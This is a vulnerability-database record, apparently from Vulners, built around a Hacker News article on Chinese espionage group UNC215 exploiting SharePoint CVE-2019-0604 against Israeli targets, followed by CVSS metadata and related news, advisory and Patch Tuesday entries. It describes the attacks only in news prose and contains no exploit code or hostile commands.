DATABASE RESOURCES PRICING ABOUT US

{"id": "THN:D0592A04885C26716DF385AE8ABF8401", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Experts Believe Chinese Hackers Are Behind Several Attacks Targeting Israel", "description": "[](<https://thehackernews.com/images/-Ujmh7zpFsSc/YRJ8YyAcN0I/AAAAAAAADfY/aKSnG-kAxuYi5IsRUzUwJJe27j89JRSTQCLcBGAsYHQ/s0/china.jpg>)\n\nA Chinese cyber espionage group has been linked to a string of intrusion activities targeting Israeli government institutions, IT providers, and telecommunications companies at least since 2019, with the hackers masquerading themselves as Iranian actors to mislead forensic analysis.\n\nFireEye's Mandiant threat intelligence arm attributed the campaign to an operator it tracks as \"UNC215\", a Chinese espionage operation that's believed to have singled out organizations around the world dating back as far as 2014, linking the group with \"low confidence\" to an advanced persistent threat (APT) widely known as [APT27](<https://malpedia.caad.fkie.fraunhofer.de/actor/emissary_panda>), Emissary Panda, or Iron Tiger.\n\n\"UNC215 has compromised organizations in the government, technology, telecommunications, defense, finance, entertainment, and health care sectors,\" FireEye's Israel and U.S. threat intel teams [said](<https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html>) in a report published today.\n\n\"The group targets data and organizations which are of great interest to Beijing's financial, diplomatic, and strategic objectives,\" the findings reflecting a relentless appetite for defense-related secrets among hacking groups.\n\n[](<https://thehackernews.com/images/-2c1Jz5J65vI/YRJ7A9dngII/AAAAAAAADfQ/KZ0_5jF33j849L6bHA21vc8l-Mq7Do0AACLcBGAsYHQ/s0/chinese-hackers.jpg>)\n\nEarly attacks perpetrated by the collective is said to have exploited a Microsoft SharePoint vulnerability (CVE-2019-0604) as a stepping stone toward infiltrating government and academic networks to deploy web shells and [FOCUSFJORD](<https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperssl>) payloads at targets in the Middle East and Central Asia. First [described](<https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/>) by the NCC Group in 2018, FOCUSFJORD, also called HyperSSL and Sysupdate, is a backdoor that's part of an arsenal of tools put to use by the Emissary Panda actor.\n\nUpon gaining an initial foothold, the adversary follows an established pattern of conducting credential harvesting and internal reconnaissance to identify key systems within the target network, before carrying out lateral movement activities to install a custom implant called [HyperBro](<https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/>) that comes with capabilities such as screen capture and keylogging.\n\n[](<https://thehackernews.com/images/-PRqc3a18M_Q/YRKJLbA0LHI/AAAAAAAA4VM/miSQAqPhUGM3d6CgWTeJ93xO0WgJrwCsQCLcBGAsYHQ/s0/cyberattack.jpg>)\n\nEach phase of the attack is marked by notable efforts undertaken to hinder detection by removing any traces of residual forensic artifacts from compromised machines, while simultaneously improving the FOCUSFJORD backdoor in response to security vendor reports, concealing command-and-control (C2) infrastructure by using other victim networks to proxy their C2 instructions, and even incorporating false flags in an attempt to mislead attribution.\n\nTo that effect, the group deployed a custom web shell called SEASHARPEE that's associated with Iranian APT groups on at least three occasions, and even used file paths containing references to Iran and displayed error messages in Arabic likely to obfuscate the source of the activity.\n\nWhat's more, in a 2019 operation against an Israeli government network, UNC215 obtained access to the primary target via remote desktop protocol (RDP) connections from a trusted third-party using stolen credentials, abusing it to deploy and remotely execute the FOCUSFJORD malware, the cybersecurity firm noted.\n\n\"The activity [...] demonstrates China's consistent strategic interest in the Middle East,\" the researchers concluded. \"This cyber espionage activity is happening against the backdrop of China's multi-billion-dollar investments related to the Belt and Road Initiative ([BRI](<https://en.wikipedia.org/wiki/Belt_and_Road_Initiative>)) and its interest in Israeli's robust technology sector.\"\n\n\"China has conducted numerous intrusion campaigns along the BRI route to monitor potential obstructions\u2014political, economic, and security\u2014and we anticipate that UNC215 will continue targeting governments and organizations involved in these critical infrastructure projects in Israel and the broader Middle East in the near- and mid-term,\" the teams added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-08-10T13:19:00", "modified": "2021-08-11T03:39:45", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://thehackernews.com/2021/08/experts-believe-chinese-hackers-are.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2019-0604"], "immutableFields": [], "lastseen": "2022-05-09T12:39:15", "viewCount": 57, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:0FA0C973-1E4C-48B7-BA36-DBE63803563D", "AKB:DF071775-CD3A-4643-9E29-3368BD93C00F"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0392"]}, {"type": "cve", "idList": ["CVE-2019-0594", "CVE-2019-0604"]}, {"type": "fireeye", "idList": ["FIREEYE:338F0E4516B790140B04DBFA18EAAC20"]}, {"type": "githubexploit", "idList": ["38A11E23-686C-5C12-93FA-4A82D0E04202", "90B60B74-AD49-5C01-A3B3-78E2BEFBE8DE", "90DEDA40-245E-56EA-A2AF-D7D36E62AF50"]}, {"type": "hackerone", "idList": ["H1:534630", "H1:536134"]}, {"type": "kaspersky", "idList": ["KLA11417"]}, {"type": "krebs", "idList": ["KREBS:DF8493DA16F49CE6247436830678BA8D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:7E03882ED3E2DC3F06ABC3D88D86D4E6"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "mscve", "idList": ["MS:CVE-2019-0604"]}, {"type": "mskb", "idList": ["KB4461630", "KB4462143", "KB4462155", "KB4462171", "KB4462184", "KB4462199", "KB4462202", "KB4462211"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:8D599A5B631D1251230D906E6D71C774", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E3C8B97294453D962741782EC959E79C"]}, {"type": "nessus", "idList": ["SMB_NT_MS19_FEB_OFFICE_SHAREPOINT.NASL", "SMB_NT_MS19_MAR_OFFICE_SHAREPOINT.NASL", "WEB_APPLICATION_SCANNING_112365", "WEB_APPLICATION_SCANNING_112366", "WEB_APPLICATION_SCANNING_112367", "WEB_APPLICATION_SCANNING_112368"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:D8942BC5A4E89874A6FC2A8F7F74D3F1"]}, {"type": "saint", "idList": ["SAINT:1AF7483E5B4DB373D9449DD910472EA5", "SAINT:67BEB8C11AAB63038EBD6BD535D548D7", "SAINT:C857C9B9FEF5E0F807DAAB797C3B2D87"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:35644FF079836082B5B728F8E95F0EDD"]}, {"type": "symantec", "idList": ["SMNTC-106914"]}, {"type": "talosblog", "idList": ["TALOSBLOG:AB5E63755953149993334997F5123794"]}, {"type": "thn", "idList": ["THN:42A0EFDB5165477E18333E9EE1A81D8E", "THN:B95DC27A89565323F0F8E6350D24D801"]}, {"type": "threatpost", "idList": ["THREATPOST:157F244C629A1657480AFA561FF77BE4", "THREATPOST:29D66B3C46A57CA3A0E13D7361812077", "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "THREATPOST:88C99763683E42B94F1E7D307C0D9904", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:A298611BE0D737083D0CFFE084BEC006"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:E3C3B5620EF807FF799CC5A969324BF2"]}, {"type": "zdi", "idList": ["ZDI-19-181"]}, {"type": "zdt", "idList": ["1337DAY-ID-33951"]}]}, "score": {"value": 1.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:DF071775-CD3A-4643-9E29-3368BD93C00F"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0392"]}, {"type": "cve", "idList": ["CVE-2019-0604"]}, {"type": "fireeye", "idList": ["FIREEYE:338F0E4516B790140B04DBFA18EAAC20"]}, {"type": "githubexploit", "idList": ["38A11E23-686C-5C12-93FA-4A82D0E04202", "90B60B74-AD49-5C01-A3B3-78E2BEFBE8DE", "90DEDA40-245E-56EA-A2AF-D7D36E62AF50"]}, {"type": "hackerone", "idList": ["H1:536134"]}, {"type": "kaspersky", "idList": ["KLA11417"]}, {"type": "krebs", "idList": ["KREBS:DF8493DA16F49CE6247436830678BA8D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:7E03882ED3E2DC3F06ABC3D88D86D4E6"]}, {"type": "mmpc", "idList": ["MMPC:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "mscve", "idList": ["MS:CVE-2019-0604"]}, {"type": "mskb", "idList": ["KB4462143"]}, {"type": "mssecure", "idList": ["MSSECURE:8D599A5B631D1251230D906E6D71C774", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA"]}, {"type": "nessus", "idList": ["WEB_APPLICATION_SCANNING_112365", "WEB_APPLICATION_SCANNING_112366", "WEB_APPLICATION_SCANNING_112367", "WEB_APPLICATION_SCANNING_112368"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:D8942BC5A4E89874A6FC2A8F7F74D3F1"]}, {"type": "saint", "idList": ["SAINT:1AF7483E5B4DB373D9449DD910472EA5"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"]}, {"type": "talosblog", "idList": ["TALOSBLOG:AB5E63755953149993334997F5123794"]}, {"type": "thn", "idList": ["THN:42A0EFDB5165477E18333E9EE1A81D8E", "THN:B95DC27A89565323F0F8E6350D24D801"]}, {"type": "threatpost", "idList": ["THREATPOST:157F244C629A1657480AFA561FF77BE4", "THREATPOST:88C99763683E42B94F1E7D307C0D9904", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:A298611BE0D737083D0CFFE084BEC006"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:E3C3B5620EF807FF799CC5A969324BF2"]}, {"type": "zdi", "idList": ["ZDI-19-181"]}, {"type": "zdt", "idList": ["1337DAY-ID-33951"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2019-0604", "epss": "0.974900000", "percentile": "0.999450000", "modified": "2023-03-17"}], "vulnersScore": 1.3}, "_state": {"dependencies": 1659988328, "score": 1698842854, "epss": 1679107841}, "_internal": {"score_hash": "79ed92b5af3656d2e698ffcb1aceeba5"}}

{"malwarebytes": [{"lastseen": "2019-05-29T16:33:47", "description": "Last week, Malwarebytes Labs reviewed [active and unique exploit kits](<https://blog.malwarebytes.com/threat-analysis/2019/05/exploit-kits-spring-2019-review/>) targeting consumers and businesses alike, reported about [a flaw in WhatsApp](<https://blog.malwarebytes.com/cybercrime/2019/05/whatsapp-fix-goes-live-after-targeted-attack-on-human-rights-lawyer/>) used to target a human rights lawyer, and wrote about [an important Microsoft patch](<https://blog.malwarebytes.com/cybercrime/2019/05/microsoft-pushes-patch-to-prevent-wannacry-level-vulnerability/>) that aimed to prevent a \"WannaCry level\" attack. We also profiled [the Dharma ransomware](<https://blog.malwarebytes.com/threat-analysis/2019/05/threat-spotlight-crysis-aka-dharma-ransomware-causing-a-crisis-for-businesses/>)\u2014aka CrySIS\u2014and imparted [four lessons from the DDoS attack](<https://blog.malwarebytes.com/101/2019/05/4-lessons-to-be-learned-from-the-does-ddos-attack/>) against the US Department of Energy that disrupted major operations.\n\n### Other cybersecurity news\n\n * Cybersecurity agencies from Canada and Saudi Arabia issued advisories about [hacking groups actively exploiting Microsoft SharePoint server vulnerabilities](<https://www.zdnet.com/article/microsoft-sharepoint-servers-are-under-attack/>) to gain access to private business and government networks. A different patch for the flaw, which was officially designated as [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), was already available as of February this year. (Source: ZDNet)\n * Nefarious actors behind adware try hard to be legit\u2014or at least look the part. A recent discovery of [a pseudo-VPN called Pirate Chick VPN](<https://www.bleepingcomputer.com/news/security/fake-pirate-chick-vpn-pushed-azorult-info-stealing-trojan/>) in an adware bundle was one of the ways they attempted to do this. However, the software is actually a Trojan that pushes malware, particularly the AZORult information stealer. (Source: Bleeping Computer)\n * [SIM-swapping](<https://businesstech.co.za/news/technology/315082/this-is-how-much-money-south-africans-are-losing-to-sim-swap-fraud/>), the fraudulent act of convincing a mobile carrier to swap a target's phone number over to a SIM card owned by the criminal, doubled in South Africa. This scam is used to divert incoming SMS-based tokens used in 2FA-enabled accounts. (Source: BusinessTech)\n * [Ransomware attacks on US cities are on the uptick](<https://www.abcactionnews.com/news/national/crippling-ransomware-attacks-targeting-us-cities-on-the-rise>). So far, there have been 22 known attacks this year. (Source: ABC Action News)\n * [Typosquatting](<https://blog.malwarebytes.com/glossary/typosquatting/>) is back on the radar, and it's mimicking online major new websites to push out fake news or disinformation reports, according to [a report from The Citizen Lab](<https://citizenlab.ca/2019/05/burned-after-reading-endless-mayflys-ephemeral-disinformation-campaign/>). Some of the sites copied were Politico, Bloomberg, and The Atlantic. The group behind this campaign is Endless Mayfly, an Iranian \"disinformation supply chain.\" (Source: The Citizen Lab)\n * No surprise here: Researchers from Charles III University of Madrid (Universidad Carlos III de Madrid) and Stony Brook University in the US found that [Android smartphones are riddled with bloatware](<https://nakedsecurity.sophos.com/2019/05/13/study-finds-android-smartphones-riddled-with-suspect-bloatware/>), which creates hidden privacy and security risks to users. (Source: Sophos's Naked Security Blog)\n * Organizations who are using the cloud to store PII [were considering moving back to on-premise means to store data](<https://www.netwrix.com/survey_organizations_that_store_customer_pii_in_the_cloud_consider_moving_it_back_on_premises_due_to_security_concerns.html>) due to cloud security concerns, according to a survey. (Source: Netwrix)\n * The Office of the Australian Information Commissioner (OAIC) recently released [a report about their findings on breaches in healthcare](<https://www.crn.com.au/news/health-sector-still-plagued-by-breaches-according-to-latest-oaic-report-525046>), which is still an ongoing problem. They found that such breaches were caused mainly by human error. (Source: CRN)\n * Websites of retailers are continuously [facing billions of hacking attempts every year](<https://biztechmagazine.com/article/2019/05/retailers-are-under-siege-botnets>), according to an Akamai Technology report. Consumers should take this as a wake-up call to stop reusing credentials across all their online accounts. (Source: BizTech Magazine)\n * After the discovery of Meltdown and Spectre, security flaws found in Intel and AMD chips, [several researchers have again uncovered another flaw](<https://www.wired.com/story/intel-mds-attack-speculative-execution-buffer/>) that could allow attackers to eavesdrop on every piece of user data that a processor touches. Intel collectively calls attacks against this flaw as Microarchitectural Data Sampling (MDS). (Source: Wired)\n\nStay safe, everyone!\n\nThe post [A week in security (May 13 - 19)](<https://blog.malwarebytes.com/security-world/2019/05/a-week-in-security-may-13-19/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-05-20T15:57:29", "type": "malwarebytes", "title": "A week in security (May 13 \u2013 19)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2019-05-20T15:57:29", "id": "MALWAREBYTES:7E03882ED3E2DC3F06ABC3D88D86D4E6", "href": "https://blog.malwarebytes.com/security-world/2019/05/a-week-in-security-may-13-19/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2023-12-07T18:19:24", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft SharePoint. Authentication is required to exploit this vulnerability. The specific flaw exists within the EntityInstanceIdEncoder class. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of Administrator.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-12T00:00:00", "type": "zdi", "title": "Microsoft SharePoint EntityInstanceIdEncoder Deserialization of Untrusted Data Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2019-12-18T00:00:00", "id": "ZDI-19-181", "href": "https://www.zerodayinitiative.com/advisories/ZDI-19-181/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-09-11T06:03:31", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiMp9i3Lj5A4Y_ae1brdtJ3Z_sNXlIs5YtbE10FkxMHpBYh1dM2pWGYtXkuhrCbigM3Xf7SjurwOpFR4NcA6fh63zqGDTxzanmzzesGP3Qj7hdlhJoOUm8f7XQsLOH6-ySM9JztJz0C_2DIj0ixAjL_vUCq21yT-ALhXCkyU0Zf7kX1_IYgqc_ZGPu0/s728-e100/iran.jpg>)\n\nThe U.S. Treasury Department on Friday announced sanctions against Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmaeil Khatib, for engaging in cyber-enabled activities against the nation and its allies.\n\n\"Since at least 2007, the MOIS and its cyber actor proxies have conducted malicious cyber operations targeting a range of government and private-sector organizations around the world and across various critical infrastructure sectors,\" the Treasury [said](<https://home.treasury.gov/news/press-releases/jy0941>).\n\nThe agency also accused Iranian state-sponsored actors of [staging disruptive attacks](<https://www.kryeministria.al/en/newsroom/sherbimet-publike-online-rikthehen-ne-normalitet-te-plote-ne-e-albania/>) aimed at Albanian government computer systems in mid-July 2022, an incident that forced the latter to temporarily suspend its online services.\n\nThe development comes months nearly nine months after the U.S. Cyber Command characterized the advanced persistent threat (APT) known as MuddyWater as a [subordinate element](<https://thehackernews.com/2022/01/us-cyber-command-links-muddywater.html>) within MOIS. It also comes almost two years following the Treasury's sanctions against another Iranian APT group dubbed [APT39](<https://thehackernews.com/2020/09/iranian-hackers-sanctioned.html>) (aka Chafer or Radio Serpens).\n\nFriday's sanctions effectively prohibit U.S. businesses and citizens from engaging in transactions with MOIS and Khatib, and non-U.S. citizens that engage in transactions with the designated entities may themselves be exposed to sanctions.\n\nCoinciding with the economic blockade, the Albanian government [said](<https://www.kryeministria.al/en/newsroom/videomesazh-i-kryeministrit-edi-rama/>) the cyberattack on the digital infrastructure was \"orchestrated and sponsored by the Islamic Republic of Iran through the engagement of four groups that enacted the aggression.\"\n\nMicrosoft, which investigated the attacks, said the adversaries worked in tandem to carry out distinct phases of the attacks, with each cluster responsible for a different aspect of the operation -\n\n * DEV-0842 deployed the ransomware and wiper malware\n * DEV-0861 gained initial access and exfiltrated data\n * DEV-0166 (aka [IntrudingDivisor](<https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/>)) exfiltrated data, and\n * DEV-0133 (aka [Lyceum](<https://thehackernews.com/2022/02/iranian-hackers-using-new-marlin.html>) or Siamese Kitten) probed victim infrastructure\n\nThe tech giant's threat intelligence teams also attributed the groups involved in gaining initial access and exfiltrating data to the Iranian MOIS-linked hacking collective codenamed [Europium](<https://thehackernews.com/2022/05/new-saitama-backdoor-targeted-official.html>), which is also known as APT34, Cobalt Gypsy, Helix Kitten, or OilRig.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg20UvRqzGlPFqU2WdwE5HNZ23BBjNkCHWXzWYNzkJD1FazC8EJtGI3IHc3O_dj0GZIQTLee4Q_mr8PgetfJHfLzabYz503QcC1HYHm_fI-9xYdBN1Mm5GJL-WefN5MdT2oS7GKbk4XOavKiraRQ67u8Sfab5YhNf3uxhIJm1ao9asl29hwgiUREV4W/s728-e100/cyber.jpg>)\n\n\"The attackers responsible for the intrusion and exfiltration of data used tools previously used by other known Iranian attackers,\" it [said](<https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/>) in a technical deepdive. \"The attackers responsible for the intrusion and exfiltration of data targeted other sectors and countries that are consistent with Iranian interests.\"\n\n\"The Iranian sponsored attempt at destruction had less than a 10% total impact on the customer environment,\" the company noted, adding the post-exploitation actions involved the use of web shells for persistence, unknown executables for reconnaissance, credential harvesting techniques, and defense evasion methods to turn off security products.\n\nMicrosoft's findings dovetail with [previous analysis](<https://thehackernews.com/2022/08/iranian-hackers-likely-behind.html>) from Google's Mandiant, which called the politically motivated activity a \"geographic expansion of Iranian disruptive cyber operations.\"\n\nInitial access to the network of an Albanian government victim is said to have occurred as early as May 2021 via successful exploitation of a SharePoint remote code execution flaw ([CVE-2019-0604](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-0604>)), followed by exfiltration of email from the compromised network between October 2021 and January 2022.\n\nA second, parallel wave of email harvesting was observed between November 2021 and May 2022, likely through a tool called [Jason](<https://marcoramilli.com/2019/06/06/apt34-jason-project/>). On top of that, the intrusions entailed the deployment of a ransomware strain called ROADSWEEP and the distribution of a wiper malware referred to as ZeroCleare.\n\nMicrosoft characterized the destructive campaign as a \"form of direct and proportional retaliation\" for a string of cyberattacks on Iran, including one [staged by an Iranian hacktivist group](<https://www.iranintl.com/en/202207032504>) that's affiliated to Mujahedin-e-Khalq ([MEK](<https://en.wikipedia.org/wiki/People%27s_Mojahedin_Organization_of_Iran>)) in the first week of July 2022.\n\nThe MEK, also known as the People's Mujahedin Organization of Iran (PMOI), is an Iranian dissident group largely based in Albania that seeks to overthrow the government of the Islamic Republic of Iran and install its own government.\n\n\"Some of the Albanian organizations targeted in the destructive attack were the equivalent organizations and government agencies in Iran that experienced prior cyberattacks with MEK-related messaging,\" the Windows maker said.\n\nIran's Foreign Ministry, however, has [rejected accusations](<https://irangov.ir/detail/395679>) that the country was behind the digital offensive on Albania, calling them \"baseless\" and that it's \"part of responsible international efforts to deal with the threat of cyberattacks.\"\n\nIt further [condemned the sanctions](<https://irangov.ir/detail/395759>) and called the act based on \"false and unproven\" accusations, stating it \"will use all its capabilities within the framework of international law to uphold the Iranians' rights and defend itself against these sinister conspiracies.\" The Ministry also accused the U.S. of \"giving full support to a terrorist sect\", referring to MEK.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-10T09:43:00", "type": "thn", "title": "U.S. Imposes New Sanctions on Iran Over Cyberattack on Albania", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2022-09-11T04:05:39", "id": "THN:F6379983339D06A5EA6BE2B059C2955B", "href": "https://thehackernews.com/2022/09/us-imposes-new-sanctions-on-iran-over.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:00", "description": "[](<https://thehackernews.com/images/-D-oD50ZgyYg/XGMduaTR0_I/AAAAAAAAzS4/3oM4vpRA4q8uYipj1OnHdJM7A6sPBbLjwCLcBGAs/s728-e100/Microsoft-software-patch-updates.jpg>)\n\nMicrosoft has issued its [second Patch Tuesday](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/51503ac5-e6d2-e811-a983-000d3a33c573>) for this year to address a total of 77 CVE-listed security vulnerabilities in its Windows operating systems and other products, 20 of which are rated critical, 54 important and 3 moderate in severity. \n \nFebruary security update addresses flaws in Adobe Flash Player, Internet Explorer, Edge, Windows, MS Office, and Office Services and Web Apps, ChakraCore, .NET Framework, Exchange Server, Visual Studio, Azure IoT SDK, Dynamics, Team Foundation Server, and Visual Studio Code. \n \nFour of the security vulnerabilities patched by the tech giant this month have been reported as being publicly known at the time of release, and one is being actively exploited in the wild. \n \nThe vulnerability actively being exploited in the wild is rated as important and resides in the way Internet Explorer handles objects in the memory. \n \nAn attacker can trick victims into landing on a specially crafted website and exploit this vulnerability, identified as [CVE-2019-0676](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0676>), to check for files on a target system, leading to information disclosure. \n \nThough Microsoft has not yet shared any details about the malicious campaign exploiting this flaw, the vulnerability likely restricted to targeted attacks. \n \nOne of the publicly disclosed flaws but not exploited in the wild, identified as [CVE-2019-0636](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0636>) and rated as important, concerns an information vulnerability in Windows operating system that could allow an attacker to read the contents of files on disk. \n \n\n\n> \"An information vulnerability exists when Windows improperly discloses file information,\" Microsoft says in its advisory. \"To exploit the vulnerability, an attacker would have to log onto an affected system and run a specially crafted application.\"\n\n \nAs expected, almost each of the listed critical-rated vulnerabilities leads to remote code execution attacks and primarily impact various versions of Windows 10 and Server editions. \n \nThough there is no public exploit, the critical remote code execution vulnerabilities in SharePoint (CVE-2019-0594 and CVE-2019-0604) and Windows DHCP Servers (CVE-2019-0626) are more troubling, as the successful exploitation of these flaws could allow attackers to run arbitrary code and take control of the server. \n \nWhile some of the important-rated vulnerabilities also lead to remote code execution attacks, others allow elevation of privilege, information disclosure, security feature bypass, and spoofing vulnerabilities. \n \nUsers and system administrators are strongly recommended to apply the latest security patches as soon as possible to keep hackers and cybercriminals away from taking control of their systems. \n \nFor installing the latest security patch updates, head on to Settings \u2192 Update &amp; Security \u2192 Windows Update \u2192 Check for updates, on your computer system or you can install the updates manually. \n \nAdobe has also rolled out security updates to fix a total of 75 vulnerabilities in its various software, 71 of which resides in [Adobe Acrobat and Reader](<https://thehackernews.com/2019/02/adobe-software-update.html>) alone. Users of the affected Adobe software for Windows and macOS systems are highly recommended to update their software packages to the latest versions as soon as possible. \n\n\nFound this article interesting? Follow THN on 